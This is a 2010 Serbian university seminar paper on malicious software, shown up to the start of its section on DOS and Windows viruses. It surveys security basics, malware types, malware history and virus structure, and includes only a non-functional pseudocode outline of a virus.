Zlonamerni Programi Goran Panić

Univerzitet u Novom Sadu Prirodno – matematički fakultet Departman za matematiku i i
nformatiku
Zlonamerni programi
- SEMINARSKI RAD -
Predmet: Bezbednost u rač. mreţama Nastavnik: dr Dušan Surla
Student: Goran Panić Broj indeksa: 11D/2009
Novi Sad, 2010.
Bezbednost u računarskim mreţama
Seminarski rad | Zlonamerni programi
ZADATAK SEMINARSKOG RADA
Obraditi oblast koja se bavi kompjuterskim virusima, crvima, trojanskim konjima
i ostalim zlonamernim programima. Analizirati načine sprečavanja njihovog infiltrira
nja u sistem i metode borbe u slučaju prodora. Cilj rada nije obučavanje korisnika k
ako da piše zlonameran program, već da omogući šire razumevanje problema i raspoloţivih me
toda zaštite.
Strana|2
SADRŢAJ
1. UVOD ........................................................................
............................................. 5 1.1 Kriptografija...............
................................................................................
........ 5 1.2 Aplikacije mreţne bezbednosti .....................................
.................................... 6 1.3 Sistemska bezbednost ................
...................................................................... 8 2. ZLON
AMERNI PROGRAMI ................................................................
................. 10 2.1 Podela zlonamernih programa ...........................
............................................. 10 2.2 Istorijat .................
................................................................................
........... 12 3. VIRUSI .......................................................
.......................................................... 17 3.1 DOS i Windows
virusi .........................................................................
............ 19 3.2 Linux virusi ...............................................
....................................................... 21 3.3 Makro virusi ....
................................................................................
................ 22 3.4 Skript virusi ..........................................
........................................................... 23 3.5 Destruktivnos
t virusa .......................................................................
............... 23 4. CRVI......................................................
............................................................... 25 4.1 Poznati c
rvi ............................................................................
......................... 26 5. TROJANSKI KONJI.................................
............................................................. 29 5.1 Login .....
................................................................................
.......................... 30 5.2 Backdoor .....................................
................................................................... 31 5.3 Joke
................................................................................
................................ 31 5.4 NetBus alatka ..........................
....................................................................... 32 6. PR
OBLEMATIČNE KOMPONENTE ...........................................................
......... 34 6.1 Java skript....................................................
................................................... 34 6.2 ActiveX kontrole ....
................................................................................
.......... 35 6.3 VB skript ....................................................
..................................................... 35 7. PARAZITSKI PROGRAMI
................................................................................
.... 37 7.1 Adware .............................................................
.............................................. 37 7.2 Spyware ..................
................................................................................
........ 37 7.3 Tajne mreţe ......................................................
.............................................. 38 7.4 Detekcija i uklanjanje par
azitskih programa .................................................... 39 8. ROO
TKIT ...........................................................................
.................................. 40 8.1 Podela rootkit alata .................
........................................................................ 40 8.2
Linux ..........................................................................
..................................... 41
Strana|3
8.3 Windows rootkit ............................................................
.................................. 41 8.4 Detekcija i uklanjanje rootkit alata..
................................................................. 42 9. ZAŠTITA OD
ZLONAMERNIH PROGRAMA ....................................................... 44
9.1 Podela antivirusnih programa ..............................................
........................... 44 9.2 Odabir antivirusnog alata ...................
............................................................. 45 10. INTERNET SE
CURITY PAKETI...................................................................
...... 47 10.1 Kaspersky Internet Security 2010 ................................
................................. 47 10.2 AVG Internet Security 8.5 ............
................................................................. 49 10.3 BitDef
ender Internet Security 2009 ...................................................
............ 50 10.4 ESET NOD32 Smart Security .................................
...................................... 52 10.5 Norton Internet Security 2009 ...
.................................................................... 53 10.6 F-S
ecure Internet Security 2009 ...................................................
................ 54 10.7 Uporedne karakteristike ...............................
................................................. 56 11. PRIMERI KODA ..........
................................................................................
....... 57 11.1 Inicijalna klasa ...............................................
............................................... 57 11.2 Onesposobljavanje zaštite
............................................................................ 59
11.3 Širenje infekcije po sistemu ................................................
.......................... 60 11.4 Upotreba elektronske pošte kao sistema prenosa
........................................ 61 11.5 Potpisivanje – Registry baza.....
.................................................................... 63 11.6 Des
truktivno ponašanje ..............................................................
.................. 64 11.7 Preporuke ...........................................
.......................................................... 65 12. ZAKLJUČAK.......
................................................................................
................ 66 13. LITERATURA .............................................
........................................................ 68 Reference ..........
................................................................................
................... 68 Web stranice ............................................
............................................................. 68
Strana|4
1. UVOD
Kolekciju alata dizajniranu da zaštiti podatke na računaru i spreči napade hakera nazi
vamo alatima za računarsku bezbednost (engl. Computer security). Zaštita podataka to
kom prenosa putem mreţe predstavlja mreţnu bezbednost (engl. Network security). Ne m
oţe se povući jasna granica izmeĎu ove dve forme zaštite. OSI arhitektura predstavlja nači
n u organizovanju pruţanja bezbednosti. Fokusira se na bezbednost od napada, bezbe
dnosne mehanizme i bezbednosne servise. Bilo kakva radnja koja ima za cilj da ug
rozi bezbednost tuĎih informacija predstavlja bezbednosni napad (engl. Security At
tacks). Bezbednosni napadi se mogu podeliti na: Pasivne napade – analiziranje saob
raćaja Aktivne napade – aktivno menjanje sadrţine podataka koji se prate
Radi povećanja sigurnosti obrade podataka i prenosa informacija u nekom sistemu, k
oristi se usluga bezbednosnih servisa (engl. Security service). Ona treba da obe
zbedi odgovor na bezbednosni napad i iskoristi bezbednosne mehanizme (mehanizmi
dizainirani za otkrivanje, prevenciju ili oporavak od sigurnosnog napada) u cilj
u odbrane. Knjiga (Stallings, 2007) se bavi problemom mreţne bezbednosti. Celokupn
a mreţna (internet) bezbednost se u knjizi deli na tri oblasti: Kriptografija – krip
tovanje, ključevi, autentifikacija poruka … Aplikacije mreţne zaštite – aplikacije za aute
ntifikaciju, e-mail bazbednost, IP bezbednost , Web bezbednost, upravljanje mreţno
m besbednosti ... Sistemska zaštita – upadi, maliciozni programi, firewall ...
1.1 Kriptografija
U slučaju prenosa poverljive poruke na udaljenu lokaciju, korisnik i primalac ne m
ogu biti sasvim sigurni da poruka pri prenosu neće biti čitana ili njen sadrţaj menjan
. Jedino što preostaje u ovom slučaju je pokušaj zaštite poruke, kako bi bila napadaču neči
ljiva tokom njenog prenosa. Kriptografija je tehnika koja se koristi u cilju obe
zbeĎivanja tajnosti poruka. Kriptografski algoritam predstavlja skup dve matematičke
funkcije: funkcije šifrovanja i funkcije dešifrovanja. Pošiljalac kriptuje poruku uz
pomoć algoritma za kriptovanje i ključa, a tako kriptovana poruka se prenosi preko m
reţe, sve do primaoca. Primalac koristi algoritam za dekriptovanje poruke i svoj k
ljuč, da bi poruku dekriptovao i time doveo u stanje pre kriptovanja. Ukoliko neko
presretne poruku koja se šalje, neće biti u mogućnosti da pročita njen sadrţaj, pošto je š
ovan.
Strana|5
Slika 1.1 Pojednostavljen model šifrovanja i dešifrovanja poruke – preuzeto iz (Stalli
ngs, 2007) Algoritmi za šifrovanje mogu biti: tajni (nema kontrole kvaliteta, slab
a sigurnost) i javni (sigurnost se postiţe ključevima). Javni algoritmi se dalje mog
u podeliti na: Simetrične algoritme – Ključ za dešifrovanje se moţe izračunati na osnovu
uča za šifrovanje i obrnuto, a najčešće su ova dva ključa jednaka. Pošiljalac i primalac se
raju dogovoriti o korišćenom ključu pre šifrovane komunikacije. Asimetrične algoritme – Klj
za šifrovanje se razlikuje od ključa za dešifrovanje, koji se ne moţe u razumnom vremenu
izračunati na osnovu ključa za šifrovanje. Ključ za šifrovanje je najčešće “javni ključ”,
frovanje “tajni ključ”.
Digitalni potpis (engl. Digital Signatures) sluţi za utvrĎivanje besprekornosti info

rmacije i za identifikaciju pošiljaoca. Bez pomoći drugih alata nije u stanju da osi
gura tajnost informacije.
1.2 Aplikacije mreţne bezbednosti
Aplikacije za autentifikaciju spadaju u grupu aplikacija koje se bave mreţnom bezb
ednosti. Kerberos je računarski mreţni protokol za potvrdu identiteta, koji omogućava
komunikaciju preko čvorova koji nisu bezbedni na mreţi. Zasniva se na simetričnoj krip
tografiji i zahteva pristup poverljive treće strane, kojoj čvorovi dokazuju svoj ide
ntitet po principu klijent – server. Standard X.509 sluţi za definisanje infrastrukt
ure javnih ključeva. On odreĎuje standardni format javnog kluča, listu opoziva sertifi
kata, atribute sertifikata i putanju za proveru validnosti algoritma. U virtualn
o distribuiranom okruţenju elektronska pošta je najkorišćenija mreţno bazirana aplikacija.
Zbog toga se bezbednosti elektronske pošte (engl. Electronic Mail Security) posveću
je posebna paţnja. Pretty Good Privacy je (engl. open-source), besplatno dostupan
programski paket za e-mail bezbednost, kreiran od strane Phil Zimmermann-a. Podrţa
va autentifikaciju poruke uz pomoć digitalnog potpisa, simetričnu blok enkripciju, Z
IP
Strana|6
algoritam za kompresiju, Radix-64 šemu za kriptovanje, segmentaciju i ponovno prim
anje e-mail-a. MIME (engl. Multipurpose Internet Mail Extensions) je ekstenzija
za RFC 822 framework, koja je namenjena za rešavanje problema upotrebe SMTProtokol
a ili nekih drugih protokola za e-mail. S/MIME predstavlja unapredjenje bezbedno
sti za MIME Internet e-mail standard, baziran na tehnologiji RSA. Ovaj internet
standard uključuje i neke PGP funkcije. IP Bezbednost (engl. IPSec) predstavlja mo
gućnost koja se moţe dodati IPv4 i IPv6 verzijama internet protokola putem dodatnih
zahteva. IPSec obuhvata tri funkcionalna oblasti: autentifikacija, poverljivost
i upravljanje ključevima. Zbog svoje transparentnosti web predstavlja savršenu metu
za razne vrste bezbednosnih napada, zato je potrebno obratiti paţnju i na segment
Web bezbednosti (engl. Web Security). SSL i TSL protokoli proširuju standardni htt
p protokol u https protokol za bezbednu komunikaciju. Secure socket layer (SSL)
pruţa bezbednosni servis izmeĎu TCP i aplikacije koja koristi TCP. SSL protokol nije
poseban protokol, nego dva spojena protokola: Record Protocol i tri specifična pr
otokola (Handshake Protocol / Alert Protocol / Change Cipher Spec Protocol).
Slika 1.2 Izgled SSL protokola – preuzeto iz (Stallings, 2007) SET (engl. Secure e
lectronic transaction) je standard koji sluţi za protekciju transakcija sa kreditn
im karticama na Internetu. Ovaj standard pruţa sledeće uluge: ObezbeĎuje siguran kana
komunikacije izmeĎu svih strana uključenih u komunikaciju. ObezbeĎuje poverenje upotr
ebom X.509v3 digitalnog sertifikata. ObezbeĎuje privatnost jer je infrastruktura d
ostupna samo za strane u transakciji.
Jedna od osnovnih osobina mreţe je njen rast. Vremenom mreţe postanu toliko velike d
a ih je nemoguće odrţavati ako sistem odrţavanja ne koristi
Strana|7
automatizovane alate za upravljanje mreţnom bezbednosti (engl. Network Management
Security). SNMP (engl. Simple Network Managment Protocol) predstavlja najraspros
tranjeniji standard toga tipa i uključuje kolekciju alata za praćenje i kontrolu rad
a mreţe. Model za upravljanje mreţom koji se koristi u SNMP-u obuhvata sledeće ključne e
lemente: Upravljanje stanicama (tipičan samostalni ureĎaj koji mora biti sposoban d
se implementira na zajednički sistem). Upravljanje agentima (upravlja informacija
ma iz stanica). Upravljanje informacionim bazama Upravljanje mreţnim protokolom (s
tanice i agenti su povezani).
1.3 Sistemska bezbednost
Neautorizovani upad u kompjuterski sistem ili mreţu, predstavlja jednu od najozbil
jnijih pretnji u kompjuterskoj bezbednosti. Sigurno je da i najbolji sistem za s
prečavanje upada neće uspeti , stoga treba razviti drugu liniju odbrane sistema, de
tekciju upada. Detekcija upada sistema mora biti razvijena tako da obezbedi rano
upozorenje i odbranu sistema u cilju prevencije i minimizacije štete. Otkrivanje
upada podrazumeva otkrivanje neuobičajenih obrazaca aktivnosti ili obrazaca aktivn
osti koji se mogu povezati sa upadom. Cilj upada na neki sistem je pristupanje t
om sistemu ili povećanje privilegija na istom. Kolekcija korisničkih imena i lozinki
mora se čuvati negde u sistemu, meĎutim one predstavljaju čestu metu napada. Upravlja
nje šiframa (engl. Password menagement) predstavlja vaţan element prevencije upada,
a sluţi onemogućavanju neautorizovanih korisnika da doĎu do prava pristupa. Tako, zaštit
a lozinke predstavlja prvu liniju odbrane sistema od uljeza. U multi-korisničkim s
istemima zahteva se da korisnik obezbedi pored korisničkog imena ili identifikator
a (ID-a) i lozinku sistema. Lozinka sluţi za proveru pojedinačne prijave na sistem,
dok ID obezbeĎuje sigurnost, tako što: odreĎuje da li je korisnik ovlašćen da pristup
temu; odreĎuje privilegije dodeljene korisniku; koristi se za kontrolnu pristupa
Mnoge organizacije zbog prirode posla moraju da obezbede dostupnost podataka, a
samim tim i zaštitu od nekontrolisanog pristupa. Da bi se sprečio nekontrolisani pro
tok podataka, u mreţu se ubacuje inteligentna barijera, Firewall [58], koju mreţni s
aobraćaj mora preći u oba smera. Kontrola pristupa podacima odlučuje o pravu pristupa.
Najčešće je realizovana preko matrice pristupa i definiše ko ima pravo vršenja radnje, na
d kojim objektom i sa kakvim privilegijama (npr. pravo čitanja). Firewall moţe biti
dizajniran da radi kao filter na nivou IP paketa ili da operiše sa višim nivoima pro
tokola.
Strana|8
Verovatno najčuveniju grupu tehnika, koje pripadaju oblasti mreţne bezbednosti, pred
stavljaju zlonamerni programi (maliciozni softver). Zlonamerni programi se namer
no ubacuju u računar ili neki drugi ureĎaj, sa namerom nanošenja štete sistemu. Ovom gru
pom alata i zaštitom od njih, se bavi ovaj rad.
Strana|9
2. ZLONAMERNI PROGRAMI
Područje računarske sigurnosti koje se bavi zlonamernim programima često u medijima st
vara veliku paţnju. Obaveštenja koja se prosleĎuju na taj način, a govore o zlonamernim
programima su neretko preuveličana i netačna. U ovom poglavlju radi boljeg razumevan
ja ovakvih programa definisane su različite kategorije zlonamernog softvera sa nji
hovim karakteristikama i mogućnostima zaštite od istih. U zlonameran program (engl.
malware, malicious software) ubraja se svaki program napravljen u nameri da na b
ilo koji način ošteti računar ili oteţa (onemogući) njegovo korišćenje. Štetu koju zlonamer
ogrami mogu izazivati na nekom sistemu delimo u tri osnovne kategorije: Namerna št
eta uzrokovana izvršenjem destruktivnog dela koda samog programa. Ova šteta ne posto
ji uvek (dobroćudni virusi), a kada postoji svodi se na brisanje ili izmenu podata
ka u sistemu, a neretko i na fizička oštećenja sistema (prepisivanje BIOS-a). Slučajna šte
ta, koja nastaje pri pokušaju instalacije zlonamernog programa ili njegovog skriva
nja u sistemu. Najčešće dovodi do uništenja podataka na računaru usled loše napisanog koda
akvog programa. Propratna šteta, koja je uzrokovana delovanjem virusa ili crva, a
manifestuje se gubitkom memorijskog prostora ili zagušenjem veze i servisa. U ovaj
tip štete spada i šteta od otkrivanja poverljivih informacija, a koju najčešće izazivaju
trojanski konji i špijunski programi.
Ponekad se programi, koji inače sluţe u korisne (dobronamerne) svrhe, mogu upotrebit
i u zlonamerne svrhe, što dodatno oteţava raspoznavanje i zaštitu.
2.1 Podela zlonamernih programa
Postoje više tipova zlonamernih programa, a najčešće se grupišu na osnovu načina prenosa: G
upisanje ne osnovu nosioca Zahtevaju nosioca, tačnije program u kome će biti sakriv
ni (virusi, trojanski konji, logičke bombe, klopke) Samostalni, ne zahtevaju nosio
ca (crvi, špijunski programi). Repliciraju se (virusi, crvi) Ne repliciraju se (tr
ojanski konji, logičke bombe).
Grupisanje na osnovu repliciranja
S t r a n a | 10
KLOPKE LOGIČKE BOMBE POTREBAN NOSILAC ZLONAMERNI PROGRAMI ROOTKIT
SAMOSTALNI
TROJANSKI KONJI VIRUSI REPLICIRAJU SE CRVI
ŠPIJUNSKI PROGRAMI
Slika 2.1 Podela zlonamernih programa Virus [1] je program koji moţe inficirati dr
uge programe, tako što u njih ubacuje svoju kopiju, koja ih inficira i u stanju je
da se dalje širi. Pod infekcijom se u računarskoj terminologiji smatra promena toka
pokrenutog programa. Bitno je napomenuti da virusi ne moraju uvek da deluju des
truktivno, već samo kada su tako programirani. Osnovna osobina virusa, njihovo rep
liciranje, omogućava da se oni brzo šire i teško uklanjaju iz zaraţenog sistema i predst
avljaju najopasniju vrstu zlonamernih programa. Većina malicioznih programa sa koj
ima se danas korisnik računara susreće predstavljaju uglavnom crve [2]. Crvi predsta
vljaju zlonamerne programe koji imaju mogućnost širenja (repliciranja) na druge računa
re unutar mreţe, a da se pri tom ne infiltriraju u druge programe. Crv se moţe defin
isati kao virus koji ne poseduje parazitske osobine, već se samostalno replicira.
Trojanske konje [3] vrlo je jednostavno razlikovati od virusa i crva, oni se ne
repliciranju sami već je potrebna eksplicitna akcija korisnika. Obično se distribuir
aju kao deo nekog programa, za koji korisnik ne zna da postoji, a često se mogu pr
onaći i kao dodatak elektronskoj pošti. Najčešće aktivnosti trojanaca su brisanje podataka
i kraĎa poverljivih informacija od korisnika.
S t r a n a | 11
Logička bomba [4] (engl. logical bomb) je zlonameran kod ugraĎen u neki koristan pro
gram koji će se aktivirati kada se ispune odgovarajući uslovi (recimo u odreĎeno vreme
- vremenska bomba). Prenosi se kao deo trojanskog konja ili se moţe ubaciti kao d
eo programa. Mogućnosti su praktično neograničene i zavise samo od mašte autora koda. Zo
mbi (engl. zombie) je program koji potajno preuzima kontrolu nad drugim umreţenim
računarom. Nakon toga ga koristi da indirektno lansira napad. Često se koriste za la
nsiranje distribuiranog napad odbijanjem usluga [5] (engl. distributed denial of
service – DDoS attacks). Njegova infiltracija u sistem se najčešće zasniva na korišćenju p
znatih propusta u mreţnim sistemima. Klopka (engl. trap door). Autor programa moţe s
lučajno ili namerno ostaviti prazna mesta u svom kodu (klopku). Uljez koji zna za
ta mesta moţe da podmetne svoj kod i time ostvari neku dobit. Osim toga, autor pro
grama moţe izmeniti deo koda tako da se izmena ne moţe jednostavno primetiti. Na pri
mer, zaokruţivanje iznosa transakcije na neku celobrojnu vrednost u odreĎenim trenuc
ima, predstavlja klopku ukoliko se ostatak zaokruţivanja prenosi na račun programera
. Klopke se teško otkrivaju, jer treba analizirati celokupan kod sumnjivog program
a. Špijunski programi [6] (engl. spyware) je neţeljeni program, instaliran na računaru
bez znanja ili odobrenja korisnika, koji prikuplja informacije o aktivnostima k
orisnika, lozinkama, poverljivim podacima, finansijskim transakcijama... U špijuns
ke programe mogu se ubrojati i trojanski konji iz kategorije kradljivaca informa
cija (npr. keylogger). Reklamni špijunski programi [7] (engl. adware) informacije
prikupljaju i šalju kompanijama koje se bave posebnom vrstom marketinga zasnovanom
na praćenju vaših navika pri pretraţivanju Web-a i na oglašavanju (engl. behavioural ma
rketing). Rootkit [8] predstavlja komplet alata koji omogućavaju napadaču da odrţava p
ristup sistemu. Napadač na ovaj način stiče pravo daljinskog upravljanja tuĎim računarom,
a da legitimni korisnik toga nije ni svestan.
2.2 Istorijat
Prvi programi koji su imali za cilj da nanesu neku štetu, dosta se razlikuju od da
našnjih programa takve namene. Virus Brain [9] bio je prvi zlonamerni program, koj
i je uspeo da se raširi i inficira računare. Pojavio se 1986. godine i predstavlja n
ajstariji poznati PC virus. U to vreme jedini medij koji su virusi mogli da zara
ze bila je disketa, pošto tvrdi diskovi nisu bili dostupni prosečnim korisnicima. Br
ain je u boot sektoru (sektor koji se učitava prvi pri podizanju računara i predstav
lja idealno mesto za postavljanje virusa) upisivao sebe samog dok je izvršni sadrţaj
premeštan na prazan prostor diskete. Taj prostor je zatim proglašavan neispravnim,
da bi se sprečilo prepisivanje od stane operativnog sistema i time omogućilo dalje šir
enje virusa…
S t r a n a | 12
Slika 2.2 Brain virus – preuzeto iz [9] Ovaj virus nije nanosio nikakvu štetu, ako i
zuzmemo zauzimanje memorijskog prostora na disketi, već se samo širio. Zanimljiva činj
enica vezana za Brain virus je da se u njegovom telu mogla pronaći potpuna adresa
kreatora koda.
Welcome to the Dungeon © 1986 Basit * Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730
NIZAM BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE: 430791,443248,280530. Bewa
re of this VIRUS.... Contact us for vaccination..
Pojava Brain virusa dovodi do pojave prve grupe virusa nazvane Boot-sector infec
tor (BSI) virusi. BSI virusi su svi virusi koji zamenjuju izvorni sadrţaj boot sek
tora na disketi ili tvrdom disku u zavisnosti od tipa virusa. Najpoznatiji preds
tavnik ove grupe virusa je Stoned virus [10], koji se pojavio 1990. godine, a ra
dio je na sličnom principu kao Brain virus. Virus je bio dizajniran bez štetne nosiv
e komponente, a računar zaraţen ovim virusom povremeno je ispisivao poruku: Your PC
is now stoned. Iste godine otkriven je Cascade virus [11], prvi virus koji je up
otrebljavao enkripciju kao jednostavan oblik polimorfizma. Polimorfizam predstav
lja sposobnost zlonamernog programa da promeni izgled izvršnog koda, najčešće enkripcijo
m ili
S t r a n a | 13
promenom redosleda koda. Ova osobina oteţava detekciju takvog programa od strane a
ntivirusnih alata. Sa pojavom prvih virusa dolazi do pojave novog vida zabave. I
zmišljena je nova igra koja dobija ime “Ratovi u jezgru”. Ova igra sastoji se od pisan
ja programa koji se istovremeno pokreću na jednom računaru, a cilj je preţivljavanje i
uništavanje konkurentnih programa. Programi imaju pravo replikacije u memoriji i
prepisivanja druge memorije. Ova igra dovela je do zaključka da manji i jednostavn
iji programi koji se brţe izvršavaju imaju veću šansu za uspeh. To se odrazilo na kreira
nje zlonamernih programa i njihovu kompleksnost. Morris Worm [12], koji je dobio
ime po autoru, pojavio se 1988. godine i predstavlja jednog od najpoznatijih cr
va. Ovaj crv napadao je računare sa UNIX operativnim sistemom, a prenosio se putem
Intreneta, koji je u to vreme bio vrlo zatvoren, te se malo paţnje posvećivalo njeg
ovoj bezbednosti. Iz tog razloga ovaj crv je uspeo da putem opterećenja mreţe blokir
a mnoge sisteme. Autor ovog crva Robert Moris je bio prvi osuĎenik u SAD zbog zlou
potrebe računara, a dobio je kaznu od 3 godine zatvora, koja je uslovno zamenjena
sa 400 sati društveno korisnog rada i 10 500$ novčane kazne. Pojava ovog crva izazva
la je još jedan izuzetak, osnovana je organizacija CERT [13] (engl. Computer Emerg
ency Response Team), ključna organizacija za računarsku sigurnost i incidente. Prvi
poznati trojanski konj pod imenom AIDS [14], [15] pojavio se 1990. godine, a pre
dstavljao je metodu iznuĎivanja novca za spašavanje korisnih podataka. Posle pokreta
nja programa kriptovao bi se sadrţaj hard-diska, a potom obavestio korisnik da mor
a platiti licencu za program ukoliko ţeli da povrati svoje podatke.
Slika 2.3 AIDS virus na delu – preuzeto iz [15]
S t r a n a | 14
EICAR [16] (engl. European Institute for Computer Anti-virus Research) je osnova
n 1990. godine i postaje glavna organizacija za saradnju izmeĎu antivirusnih proiz
voĎača i akademske zajednice. Samo godinu dana kasnije na trţištu je postojao veći broj an
tivirusnih program, ali je i broj poznatih virusa narastao na 1000. Godine 1992.
javlja se jedan vrlo zanimljiv programski paket VCL [17] (engl. Virus Creation
Laboratory). Paket je imao za cilj da svakom korisniku, bez obzira na znanje, om
ogući da napravi svoj virus.
Slika 2.4 Izgled VCL alata – preuzeto iz [17] Vremenom je broj ovakvih paketa pora
stao, meĎutim virusi koje su oni generisali bili su vrlo ograničeni, čak ni oni sa ugr
aĎenim polimorfizmom (TPE, DAME) nisu ostvarili veći učinak. Sledeća grupa zlonamernih p
rograma koja se pojavila bili su makro virusi. Makro virus upotrebljava programs
ki kod implementiran u različitim programskim paketima, koji je namenjen za olakšava
nje raznih funkcija. Ovi virusi najčešće napadaju Microsoft Office programski paket. W
M / Concept se smatra prvim rasprostranjenim makro virusom, a njegov uspeh povuk
ao je za sobom mnoštvo drugih makro virusa. Virus je na zaraţenom računaru ispisivao p
oruku: That’s enough to prove my point Pošto makro virusi dolaze sa otvorenim kodom,
kasnija promena od strane drugog lica predstavlja prilično jednostavan posao. Oni
ne inficiraju izvršni datoteku, već dokumente za različite programe, iz tog razloga o
ni mogu delovati na različitim platformama.
S t r a n a | 15
Pored svih ovih problema sa kojima se sreće običan korisnik računara, a koji mogu biti
manje ili više opasni, pojavile su se i laţne uzbune. Hoax [18] poruka predstavlja
laţno upozorenje, često o nepostojećem problemu. Poruka od primaoca zahteva da pošalje u
pozorenje na što više adresa. Good Times hoax je predstavnik ove grupe zlonamernih p
oruka, a prvi put je lansiran u novembru 1994. godine. Da zlonamerni programi mo
gu biti jako destruktivni, pa čak uništavati i hardver, svedoči primer CIH virusa [19]
. Ovaj virus otkriven je 1998. na Taivanu. Pored toga što uništava sve podatke sa tv
rdog diska, on pokušava da upiše nove u fleš memoriju (engl. flash memory) BIOS-a ploče.
Na taj način se računar trajno oštećuje i jedini način popravke je upisivanje ispravnih p
odataka u EEPROM, što je na pločama sa integrisanim čipom neisplativo. Kombinacija crv
a is skript jezika je 2003. godine izrodila jedan u nizu zlonamernih programa sa
imenom SQLSlammer [20], koji je uzrokovao zagušenje Interneta. Ovaj program pripa
da DoS [5] (engl. Denial of Servise) programima. DoS programi izazivaju napad na
krajnjeg korisnika uskraćivanjem računarskih resursa raznim metodama. Obično ovakav n
apad izaziva onemogućavanje korisnika da pristupi pojedinim resursima, kao na prim
er nekom web servisu.
S t r a n a | 16
3. VIRUSI
Virusi (engl. viruses) su verovatno najpoznatija vrsta od svog raspoloţivog zlonam
ernog programa. Pojam virus u rečnik računarske terminologije uvrstio je 1983. godin
e profesor Frederick B. Cohen [21], sa univerziteta Juţne Kalifornije. On je, u sv
ojoj doktorskoj tezi 1984. godine, postavio prvu opštu definiciju virusa: ˝Definišemo
kompjuterski virus kao program koji inficira ostale programe modifikujući ih tako
da uključuju njegovu naprednu kopiju. Sa inficiranog područja, virus se može širiti kroz
kompjuterski sistem i mrežu koristeći autorizaciju svakog korisnika, da inficira nj
ihove programe. Svaki program koji se inficira se takođe ponaša kao virus, i stoga,
infekcija raste˝. Pod infekcijom se kod računarskih virusa smatra promena toka progr
ama, koji je pokrenut. Treba zapaziti da definicija Cohen-a ne govori o destrukt
ivnom dejstvu virusa, koji predstavlja osnovnu asocijaciju na reč virus. Česti efekt
i infekcije virusima su brisanje vaţnih datoteka, menjanje njihovog sadrţaja ili dov
oĎenje sistema u stanje u kome ne moţe normalno da funkcioniše. Efekti fizičkog uništenja
hardvera su veoma retki, ali istorija virusa beleţi i takve slučajeve (primer CIH vi
rus). Virusi ne koriste mreţne resurse za širenje, poput crva, ali se mogu širiti prek
o mreţe kao deo nekog crva. Kao i svi drugi programi koji se sami šire, virusi u svo
m širenju koriste sasvim legitimne funkcije, poput običnih programa, što oteţava njihovo
detektovanje. Iako slični, virusi poseduju odreĎene specifičnosti, te se tako mogu po
deliti u nekoliko grupa. Najčešća klasifikacija virusa vrši se na osnovu načina napadanja
i veštini skrivanja koju primenjuju. Tako razlikujemo: Parazitski virusi (engl.
rasitic virus) – ponašaju se poput parazita, koriste izvršne datoteke za infiltraciju
Memorijski virusi (engl. memory - resident virus) – nalaze se u operativnoj memori
ji, odakle inficiraju ostale datoteke Boot sektor virusi (engl. boot sector viru
s) – nalaze se u boot sektorima diskova Nevidljivi virusi (engl. stealth) – koriste
metode prikrivanja Polimorfni (engl. polymorphic virus) – poseduju polimorfne osob
ine za promenu svog izgleda Makro virusi (engl. macro virus) – kreiraju se na osno
vu makro jezika, inficiraju dokumente programskih paketa u kojima su kreirani.
Za bolje shvatanje načina funkcionisanja virusa, neophodno je razumeti njihovu str
ukturu. Jedan od često korišćenih modela za opis strukture virusa sastoji se iz tri ko
mponente: Infekcijska komponenta – predstavlja osnovnu komponentu koja sadrţi kod ko
ji omogućava širenje virusa.
S t r a n a | 17
Nosiva komponenta (engl. payload) – sadrţi glavnu aktivnost virusa. Ovu komponentu n
e moraju da sadrţe svi virusi („dobroćudni” virusi je nemaju), a unutar nje se definiše de
struktivno ponašanje virusa. Funkcija za okidanje (engl. triger) – definiše vreme ili
neki dogaĎaj pri kojem će biti izvršena nosiva komponenta virusa. Ukoliko ne postoji n
osiva komponenta virusa, tada ne postoji ni funkcija za okidanje nosive komponen
te.
Primer strukture eksperimentalnog virusa:
public class Virus{ // Infekcijska komponeta private void Infect(){ do { file =
"Iraberi bilo koji izvršni fajl"; } while ("Fajl je inficiran" == True) UbaciVirus
(file); //Inficiranje fajla } // Nosiva komponenta private void Damage(){ "Zloma
meran kod" } // Funkcija za okidanje private bool Trigger() { if ("Ispunjeni usl
ovi okidanja") return true; return false; } public Virus(){ Infect(); if (Trigge
r()){ Damage(); } else{ "Kod koji program inače izvršava" } } }
U toku svog postojanja, od nastanka do izvršenja, virus prolazi kroz nekoliko ţivotn
ih faza: Skrivena ili uspavana faza (engl. dormant) – čekanje na dogaĎaj koji pokreće a
ciju (engl. on trigger event). Propagaciona faza (engl. propagation) – repliciranj
e virusa i njegova infiltracija u druge programe.
S t r a n a | 18
Faza okidanja (engl. triggering) – dolazi do nekog očekivanog dogaĎaja koji je definis
an u funkciji za okidanje, a koji dovodi do pokretanja nosive komponente virusa.
Faza izvršavanja (engl. execution) – izvršavaju se akcije definisane u nosivoj kompon
enti virusa.
Da bi virus imao uspeha, potrebno mu je nakon infiltracije u sistem obezbediti što
više vremena za delovanje. Vreme opstanka virusa na inficiranom sistemu, direktno
je povezano sa mogućnošću njegovog skrivanja. Iz ovih razloga autori virusa puno paţnje
posvećuju metodi skrivanja svog virusa, kada se naĎe u inficiranom okruţenju. Tako do
lazi do pojave takozvanih “nevidljivih” virusa, koji su u početku izazvali pravu panik
u. Nevidljivi virusi nisu ništa drugo do virusi koji upotrebljavaju razne mehanizm
e da bi korisniku, tačnije antivirus programu, onemogućili otkrivanje njihovog posto
janja i oteţali uklanjanje sa zaraţenog sistema. Na osnovu ovog zaključujemo da apsolu
tno nevidljivih virusa nema, oni su korisniku nevidljivi samo do odreĎenog nivoa.
Polimorfizam [22] predstavlja jedan od efikasnih načina skrivanja virusa u sistemu
. Virus koji poseduje osobine polimorfizma u stanju je da promeni svoj izvršni kod
, obično uz pomoć enkripcije ili prepakivanjem delova koda. Enkripcija označava promen
u izgleda poruke, najčešće radi njene zaštite, koja se pravilnim dekriptovanjem ponovo v
raća u prvobitno stanje. Polimorfno modifikovan virus poseduje drugačiji kod u odnos
u na svoje prethodnike (roditelje), zbog toga je njegova detekcija mnogo teţa. Pol
imorfizam praktično onemogućava detekciju virusa po njegovom potpisu, što predstavlja
najsigurniji način detekcije. Iako je većina virusa napisana za Windows operativne s
isteme, oni su prisutni i na drugim platformama. Postoje virusi (npr. makro viru
si) koji su u stanju da istovremeno operišu na više različitih platformi.
3.1 DOS i Windows virusi
Danas DOS predstavlja prevaziĎen operativni sistem. Sa njim su u istoriju otišli i v
irusi koji su postojali na njemu. MeĎutim za shvatanje principa funkcionisanja sav
remenih virusa poţeljno je razumeti principe rada DOS virusa, kao preteče modernih W
indows virusa. DOS viruse moţemo podeliti po mestu delovanja na: BSI (boot sektor)
